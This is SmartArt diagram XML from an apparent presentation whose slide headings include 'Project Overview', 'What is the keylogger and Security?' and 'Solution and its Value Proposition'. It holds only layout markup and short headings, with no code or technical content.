    <dgm:cxn modelId="{43AB37CA-2BB6-4FB5-8F24-548EF62CC241}" srcId="{0A5D39CD-C6E2-40A0-8283-74CFEB20D85C}" destId="{D47A2ECB-127B-45E4-9677-330E3F7686E2}" srcOrd="0" destOrd="0" parTransId="{9FD02915-21EC-4DE8-ADA9-C8614DA50EBE}" sibTransId="{797B14D7-AA05-4E36-9A8A-3879869FC81A}"/>
    <dgm:cxn modelId="{BE3447D1-28C7-4EAF-A0BF-300E3E56508D}" type="presOf" srcId="{0A5D39CD-C6E2-40A0-8283-74CFEB20D85C}" destId="{C83DECB5-E68A-4B9C-B4E7-CC91BCFA3A22}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess10"/>
    <dgm:cxn modelId="{2B1F67E1-8D62-403E-BCF8-FAB750AC6B66}" type="presOf" srcId="{D47A2ECB-127B-45E4-9677-330E3F7686E2}" destId="{EC72987A-5891-427B-8A96-0D62C22BFA14}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess10"/>
    <dgm:cxn modelId="{F3C97A7B-A9C4-4864-9D92-865EF7D1D083}" type="presParOf" srcId="{C83DECB5-E68A-4B9C-B4E7-CC91BCFA3A22}" destId="{3531F604-91AC-418F-BB08-75B660FA9DA5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess10"/>
    <dgm:cxn modelId="{CA2BFC43-1942-4590-8D01-5E60FCCA9F42}" type="presParOf" srcId="{3531F604-91AC-418F-BB08-75B660FA9DA5}" destId="{BCBF9E60-1795-4AF9-A355-39F2B992367F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess10"/>
    <dgm:cxn modelId="{6B5E7D86-4234-4C10-AE3E-9D9229135F2B}" type="presParOf" srcId="{3531F604-91AC-418F-BB08-75B660FA9DA5}" destId="{EC72987A-5891-427B-8A96-0D62C22BFA14}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess10"/>
    <dgm:cxn modelId="{C473207A-647D-4704-AC2C-0CC2CC692937}" type="presParOf" srcId="{C83DECB5-E68A-4B9C-B4E7-CC91BCFA3A22}" destId="{B447285D-FEB6-4765-947F-0AA70C7F9007}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess10"/>
    <dgm:cxn modelId="{7BCA60F7-10F0-49F4-B354-E0F0B758B903}" type="presParOf" srcId="{B447285D-FEB6-4765-947F-0AA70C7F9007}" destId="{C6CD5565-A317-49EC-B85C-A1D0782ED81A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess10"/>
    <dgm:cxn modelId="{A5F7A71A-CEC4-4919-B0D6-9FA5374C57A8}" type="presParOf" srcId="{C83DECB5-E68A-4B9C-B4E7-CC91BCFA3A22}" destId="{047D3B7E-5FEE-4068-9083-936BAC7F5FDB}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess10"/>
    <dgm:cxn modelId="{43C436DD-EBD6-4EB4-A007-D145984F1303}" type="presParOf" srcId="{047D3B7E-5FEE-4068-9083-936BAC7F5FDB}" destId="{11A0AAA9-22DF-40A6-AB32-44B2E094003C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess10"/>
    <dgm:cxn modelId="{3AC51FB0-D07F-4C53-ADFE-D9E5C7438F36}" type="presParOf" srcId="{047D3B7E-5FEE-4068-9083-936BAC7F5FDB}" destId="{BE94521C-C32D-46A4-ABAC-9FFC33F4AD24}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess10"/>
    <dgm:cxn modelId="{BA114A82-4CA1-48A6-9CE7-046BFDD1F730}" type="presParOf" srcId="{C83DECB5-E68A-4B9C-B4E7-CC91BCFA3A22}" destId="{67468CDE-98BA-46A7-8D56-C3DC496AC62A}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess10"/>
    <dgm:cxn modelId="{D6762B11-4F7A-413C-8EBD-7CC2F9A3F96C}" type="presParOf" srcId="{67468CDE-98BA-46A7-8D56-C3DC496AC62A}" destId="{27AFD6DB-01B9-42F6-A54C-6B740C890197}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess10"/>
    <dgm:cxn modelId="{C5827730-958B-40EF-A19E-41DC7BDF776F}" type="presParOf" srcId="{C83DECB5-E68A-4B9C-B4E7-CC91BCFA3A22}" destId="{1E412D2C-7C2D-4772-BBF7-814C7CCD13DC}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess10"/>
    <dgm:cxn modelId="{8A497FD6-F865-46E4-A20A-AD12098C2C18}" type="presParOf" srcId="{1E412D2C-7C2D-4772-BBF7-814C7CCD13DC}" destId="{E7806E98-F2ED-40B6-85DC-A0C0CAA5BCBA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess10"/>
    <dgm:cxn modelId="{A28C91B3-0ED1-4B0F-BD74-7C5E5950B265}" type="presParOf" srcId="{1E412D2C-7C2D-4772-BBF7-814C7CCD13DC}" destId="{D14AB813-89AB-4C50-977B-AC0AC4A60D3B}"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A8A9F1-5DC5-47FB-BED4-F2465BDAF4BC}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/vList3" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/3d1" qsCatId="3D" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6AD2E154-9B94-426A-8724-7A1BC631EBF9}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-IN" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Project Overview</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{369D0979-1550-4AF1-80BF-1873FB4B5069}" type="sibTrans" cxnId="{A41C1040-A15C-417A-9706-40AF1718F870}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2D451958-1BB0-4CFC-9245-EA75C829E4DB}" type="parTrans" cxnId="{A41C1040-A15C-417A-9706-40AF1718F870}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{381EEBEC-C0DD-4BCA-921E-E8EAE521FDB5}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-IN" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>What is the keylogger and Security?</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9D956C3F-D958-47C2-A19F-73DABA181813}" type="sibTrans" cxnId="{EDBA834D-37F5-4B26-B75D-EAA8163738A5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A58C8199-5A2B-412E-8674-9B2C09A47C98}" type="parTrans" cxnId="{EDBA834D-37F5-4B26-B75D-EAA8163738A5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EAC20994-8847-4090-BD76-09D5CC7116E4}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-IN"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dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{26EF786B-E64C-4A2D-95C8-532A9121CAD1}" type="sibTrans" cxnId="{15C541AF-A63F-45A6-AF98-FBFAD2A269CC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CC57D542-E250-4EC0-8DCD-C54D04DACC64}" type="parTrans" cxnId="{15C541AF-A63F-45A6-AF98-FBFAD2A269CC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{73602922-327E-4AD7-B7F8-7FFF0B2DA42F}" type="pres">
      <dgm:prSet presAssocID="{50A8A9F1-5DC5-47FB-BED4-F2465BDAF4BC}" presName="linearFlow" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{413AF296-9E30-461D-B6B8-EAEE8072B2FD}" type="pres">
      <dgm:prSet presAssocID="{381EEBEC-C0DD-4BCA-921E-E8EAE521FDB5}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DB31281B-8963-4095-9558-87323C4E1722}" type="pres">
      <dgm:prSet presAssocID="{381EEBEC-C0DD-4BCA-921E-E8EAE521FDB5}"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38C49900-FAB9-4EF2-9487-C681327A1FC1}" type="pres">
      <dgm:prSet presAssocID="{381EEBEC-C0DD-4BCA-921E-E8EAE521FDB5}" presName="txShp" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AA9E15BD-FA23-474B-AAC0-3507D56A5DA0}" type="pres">
      <dgm:prSet presAssocID="{9D956C3F-D958-47C2-A19F-73DABA181813}" presName="spacing" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{40BD816C-BB83-4C1B-8506-4F9BB6711A82}" type="pres">
      <dgm:prSet presAssocID="{EAC20994-8847-4090-BD76-09D5CC7116E4}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{463A46D2-8261-41F8-875F-7B641DC0BD02}" type="pres">
      <dgm:prSet presAssocID="{EAC20994-8847-4090-BD76-09D5CC7116E4}"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9571481A-263A-4758-9A0B-6BB1A31D76CF}" type="pres">
      <dgm:prSet presAssocID="{EAC20994-8847-4090-BD76-09D5CC7116E4}" presName="txShp" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6591DD42-B54E-400F-8BAB-44D2E427ACBF}" type="pres">
      <dgm:prSet presAssocID="{26EF786B-E64C-4A2D-95C8-532A9121CAD1}" presName="spacing" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9BBFFF39-B0E1-4FB8-ADA6-6652DA08F7E6}" type="pres">
      <dgm:prSet presAssocID="{6AD2E154-9B94-426A-8724-7A1BC631EBF9}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B46F464E-11E5-4A24-ACA0-6CF092DE9731}" type="pres">
      <dgm:prSet presAssocID="{6AD2E154-9B94-426A-8724-7A1BC631EBF9}"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CEBA8F85-01C9-4B3B-8319-1EA4A1C8629E}" type="pres">
      <dgm:prSet presAssocID="{6AD2E154-9B94-426A-8724-7A1BC631EBF9}" presName="txShp" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3" custLinFactNeighborX="651" custLinFactNeighborY="1448">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{A41C1040-A15C-417A-9706-40AF1718F870}" srcId="{50A8A9F1-5DC5-47FB-BED4-F2465BDAF4BC}" destId="{6AD2E154-9B94-426A-8724-7A1BC631EBF9}" srcOrd="2" destOrd="0" parTransId="{2D451958-1BB0-4CFC-9245-EA75C829E4DB}" sibTransId="{369D0979-1550-4AF1-80BF-1873FB4B5069}"/>
    <dgm:cxn modelId="{22DD504B-6824-4563-9AA5-E3D09BF96266}" type="presOf" srcId="{EAC20994-8847-4090-BD76-09D5CC7116E4}" destId="{9571481A-263A-4758-9A0B-6BB1A31D76CF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{EDBA834D-37F5-4B26-B75D-EAA8163738A5}" srcId="{50A8A9F1-5DC5-47FB-BED4-F2465BDAF4BC}" destId="{381EEBEC-C0DD-4BCA-921E-E8EAE521FDB5}" srcOrd="0" destOrd="0" parTransId="{A58C8199-5A2B-412E-8674-9B2C09A47C98}" sibTransId="{9D956C3F-D958-47C2-A19F-73DABA181813}"/>
    <dgm:cxn modelId="{71E9CA87-7F79-4DDD-B9F5-784ED7E3A483}" type="presOf" srcId="{50A8A9F1-5DC5-47FB-BED4-F2465BDAF4BC}" destId="{73602922-327E-4AD7-B7F8-7FFF0B2DA42F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{15C541AF-A63F-45A6-AF98-FBFAD2A269CC}" srcId="{50A8A9F1-5DC5-47FB-BED4-F2465BDAF4BC}" destId="{EAC20994-8847-4090-BD76-09D5CC7116E4}" srcOrd="1" destOrd="0" parTransId="{CC57D542-E250-4EC0-8DCD-C54D04DACC64}" sibTransId="{26EF786B-E64C-4A2D-95C8-532A9121CAD1}"/>
    <dgm:cxn modelId="{D381D4BA-258D-4F02-945D-5FF7A11CBD86}" type="presOf" srcId="{381EEBEC-C0DD-4BCA-921E-E8EAE521FDB5}" destId="{38C49900-FAB9-4EF2-9487-C681327A1FC1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{083AB1D2-36AD-444D-A09E-3A5C84F321BC}" type="presOf" srcId="{6AD2E154-9B94-426A-8724-7A1BC631EBF9}" destId="{CEBA8F85-01C9-4B3B-8319-1EA4A1C8629E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{A5AD3368-DC50-4EDD-AA64-92F65130759C}" type="presParOf" srcId="{73602922-327E-4AD7-B7F8-7FFF0B2DA42F}" destId="{413AF296-9E30-461D-B6B8-EAEE8072B2FD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{5D4B8360-79EF-4647-8B0F-D5C232CC101D}" type="presParOf" srcId="{413AF296-9E30-461D-B6B8-EAEE8072B2FD}" destId="{DB31281B-8963-4095-9558-87323C4E1722}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{64ACEA48-A833-445C-B9D6-D09AE4C9CFDE}" type="presParOf" srcId="{413AF296-9E30-461D-B6B8-EAEE8072B2FD}" destId="{38C49900-FAB9-4EF2-9487-C681327A1FC1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{C5C73BA3-F31A-471A-BEDF-4A02724D2BF7}" type="presParOf" srcId="{73602922-327E-4AD7-B7F8-7FFF0B2DA42F}" destId="{AA9E15BD-FA23-474B-AAC0-3507D56A5DA0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{72272C7A-03BA-4B9F-975B-451B8518B632}" type="presParOf" srcId="{73602922-327E-4AD7-B7F8-7FFF0B2DA42F}" destId="{40BD816C-BB83-4C1B-8506-4F9BB6711A82}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{7C1CF42A-7636-439C-AEB4-3888F8B042E9}" type="presParOf" srcId="{40BD816C-BB83-4C1B-8506-4F9BB6711A82}" destId="{463A46D2-8261-41F8-875F-7B641DC0BD02}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{9DB0996C-A852-4737-B14A-28B27D14B5CC}" type="presParOf" srcId="{40BD816C-BB83-4C1B-8506-4F9BB6711A82}" destId="{9571481A-263A-4758-9A0B-6BB1A31D76CF}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{90E356DF-7A0F-49B8-9D96-AAA1B0981037}" type="presParOf" srcId="{73602922-327E-4AD7-B7F8-7FFF0B2DA42F}" destId="{6591DD42-B54E-400F-8BAB-44D2E427ACBF}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{E92EDF3A-92E1-43CD-83EA-A26D1FEA0E1F}" type="presParOf" srcId="{73602922-327E-4AD7-B7F8-7FFF0B2DA42F}" destId="{9BBFFF39-B0E1-4FB8-ADA6-6652DA08F7E6}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{29148650-FCC3-42FE-9CCF-E6CC796F9491}" type="presParOf" srcId="{9BBFFF39-B0E1-4FB8-ADA6-6652DA08F7E6}" destId="{B46F464E-11E5-4A24-ACA0-6CF092DE9731}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{7DC7B8EC-750B-4959-885E-778625167D18}" type="presParOf" srcId="{9BBFFF39-B0E1-4FB8-ADA6-6652DA08F7E6}" destId="{CEBA8F85-01C9-4B3B-8319-1EA4A1C8629E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList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CA97D7-DCD6-402B-ABF2-F2D30DA03B34}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/vList3" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/3d1" qsCatId="3D" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E0BC6C59-02B9-411D-88F3-46E8D194D548}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-IN" dirty="0"/>
            <a:t>What are the end users?</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D58420D4-9852-465F-BA71-AFF28C199BFA}" type="parTrans" cxnId="{463364EA-495E-440A-A0FB-4E64014749FA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64C3E7D0-9523-4B02-B6F1-ABD089C789A2}" type="sibTrans" cxnId="{463364EA-495E-440A-A0FB-4E64014749FA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{962A27DC-C02C-4DD1-A386-F1A4537DF2C3}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-IN" dirty="0"/>
            <a:t>Solution and its Value Proposition</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{403EBCA9-B58C-44A5-80BF-7BB96FD117EC}" type="parTrans" cxnId="{BBB70CB2-1D2B-4502-BF4D-EA9E0FA79730}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{77DD8E23-3632-43DA-904E-81A780A621F5}" type="sibTrans" cxnId="{BBB70CB2-1D2B-4502-BF4D-EA9E0FA79730}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FBFF279B-DD6E-480D-B99C-ECA3BA74727B}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-IN" dirty="0"/>
            <a:t>The Wow in our Solution</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{32CE7381-95F5-42C6-A864-23A135FFBA07}" type="parTrans" cxnId="{6735F681-F24D-4C81-AA23-7D7ABD11CDFD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1C662D49-61F7-4213-99B4-4CA2AF9420B0}" type="sibTrans" cxnId="{6735F681-F24D-4C81-AA23-7D7ABD11CDFD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2EB52119-4908-4173-ABEB-E6B0EFD0AEC0}" type="pres">
      <dgm:prSet presAssocID="{BCCA97D7-DCD6-402B-ABF2-F2D30DA03B34}" presName="linearFlow" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4FF5C584-A778-4FB2-AA3A-519547D7D339}" type="pres">
      <dgm:prSet presAssocID="{E0BC6C59-02B9-411D-88F3-46E8D194D548}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8D70DBDD-FBC1-4EBF-8FAE-FE26E618545D}" type="pres">
      <dgm:prSet presAssocID="{E0BC6C59-02B9-411D-88F3-46E8D194D548}"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2A69484E-03CF-4ADA-BF58-8B461D3B18FE}" type="pres">
      <dgm:prSet presAssocID="{E0BC6C59-02B9-411D-88F3-46E8D194D548}" presName="txShp" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F63C1A9A-65D8-4999-8FAE-F4A4E1E86DC0}" type="pres">
      <dgm:prSet presAssocID="{64C3E7D0-9523-4B02-B6F1-ABD089C789A2}" presName="spacing" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A37700F1-488D-4D4F-A7FD-39CC46F517A2}" type="pres">
      <dgm:prSet presAssocID="{962A27DC-C02C-4DD1-A386-F1A4537DF2C3}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D0F0E57E-4B72-43A9-B078-08F4A8993480}" type="pres">
      <dgm:prSet presAssocID="{962A27DC-C02C-4DD1-A386-F1A4537DF2C3}"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EFA91578-10C0-4AC4-BD0C-B8AFE6950A9F}" type="pres">
      <dgm:prSet presAssocID="{962A27DC-C02C-4DD1-A386-F1A4537DF2C3}" presName="txShp" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{824E1C4F-98AE-49F8-B9F5-0472C0792A0B}" type="pres">
      <dgm:prSet presAssocID="{77DD8E23-3632-43DA-904E-81A780A621F5}" presName="spacing" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DF64735D-F589-400E-B668-03058CF1AACD}" type="pres">
      <dgm:prSet presAssocID="{FBFF279B-DD6E-480D-B99C-ECA3BA74727B}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FD4207EE-16B7-4309-A727-015EA933B6CF}" type="pres">
      <dgm:prSet presAssocID="{FBFF279B-DD6E-480D-B99C-ECA3BA74727B}"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399FDF71-DBAD-4545-AF47-19429BB82785}" type="pres">
      <dgm:prSet presAssocID="{FBFF279B-DD6E-480D-B99C-ECA3BA74727B}" presName="txShp" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{88E5023E-E258-4F91-8E19-F92A9E476DA5}" type="presOf" srcId="{962A27DC-C02C-4DD1-A386-F1A4537DF2C3}" destId="{EFA91578-10C0-4AC4-BD0C-B8AFE6950A9F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{C1C20840-F953-4FB5-9A64-1872017106EE}" type="presOf" srcId="{BCCA97D7-DCD6-402B-ABF2-F2D30DA03B34}" destId="{2EB52119-4908-4173-ABEB-E6B0EFD0AEC0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{6735F681-F24D-4C81-AA23-7D7ABD11CDFD}" srcId="{BCCA97D7-DCD6-402B-ABF2-F2D30DA03B34}" destId="{FBFF279B-DD6E-480D-B99C-ECA3BA74727B}" srcOrd="2" destOrd="0" parTransId="{32CE7381-95F5-42C6-A864-23A135FFBA07}" sibTransId="{1C662D49-61F7-4213-99B4-4CA2AF9420B0}"/>
    <dgm:cxn modelId="{5B85D985-E3D1-4883-B720-8178CAF3150F}" type="presOf" srcId="{FBFF279B-DD6E-480D-B99C-ECA3BA74727B}" destId="{399FDF71-DBAD-4545-AF47-19429BB82785}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{BBB70CB2-1D2B-4502-BF4D-EA9E0FA79730}" srcId="{BCCA97D7-DCD6-402B-ABF2-F2D30DA03B34}" destId="{962A27DC-C02C-4DD1-A386-F1A4537DF2C3}" srcOrd="1" destOrd="0" parTransId="{403EBCA9-B58C-44A5-80BF-7BB96FD117EC}" sibTransId="{77DD8E23-3632-43DA-904E-81A780A621F5}"/>
